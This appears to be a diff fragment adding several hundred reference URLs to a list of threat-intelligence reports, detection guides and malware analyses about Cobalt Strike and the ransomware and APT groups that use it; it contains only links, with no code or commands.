+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
+ "https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/",
+ "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear",
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://d01a.github.io/syscalls/",
+ "https://securelist.com/apt-luminousmoth/103332/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
+ "https://boschko.ca/cobalt-strike-process-injection/",
+ "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://twitter.com/RedDrip7/status/1402640362972147717?s=20",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://twitter.com/MBThreatIntel/status/1412518446013812737",
+ "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
+ "https://skyblue.team/posts/scanning-virustotal-firehose/",
+ "https://isc.sans.edu/diary/rss/27176",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/",
+ "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://cert.gov.ua/article/339662",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
+ "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang",
+ "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
+ "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
+ "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes",
+ "https://cert.gov.ua/article/703548",
+ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf",
+ "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
+ "https://www.mandiant.com/media/10916/download",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups",
+ "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://www.intezer.com/blog/malware-analysis/cobalt-strike-detect-this-persistent-threat/",
+ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
+ "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
+ "https://blogs.blackberry.com/en/2022/01/log4u-shell4me",
+ "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
+ "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ",
+ "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
+ "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://labs.k7computing.com/index.php/cobalt-strikes-deployment-with-hardware-breakpoint-for-amsi-bypass/",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
+ "https://cert.gov.ua/article/619229",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/",
+ "https://www.mandiant.com/media/12596/download",
+ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
+ "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/",
+ "https://www.youtube.com/watch?v=ysN-MqyIN7M",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
 "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e"
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
+ "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://www.youtube.com/watch?v=gfYswA_Ronw",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
+ "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
+ "http://blog.nsfocus.net/murenshark",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://redcanary.com/blog/gootloader",
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://blog.macnica.net/blog/2020/11/dtrack.html",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2",
+ "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/",
+ "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
+ "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://asec.ahnlab.com/en/34549/",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/",
+ "https://www.youtube.com/watch?v=WW0_TgWT2gs",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/",
+ "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
+ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
+ "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/",
+ "https://www.cobaltstrike.com/support",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://isc.sans.edu/diary/26752",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
+ "https://asec.ahnlab.com/en/31811/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671",
+ "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
+ "https://twitter.com/elisalem9/status/1398566939656601606",
+ "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
+ "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
+ "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/",
+ "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.telsy.com/download/5972/?uid=d7c082ba55",
+ "https://blog.group-ib.com/apt41-world-tour-2021",
+ "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/",
+ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
+ "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
+ "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
+ "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718",
+ "https://github.com/chronicle/GCTI",
+ "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
+ "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://cert.gov.ua/article/37704",
+ "https://connormcgarr.github.io/thread-hijacking/",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI",
+ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://community.riskiq.com/article/f0320980",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
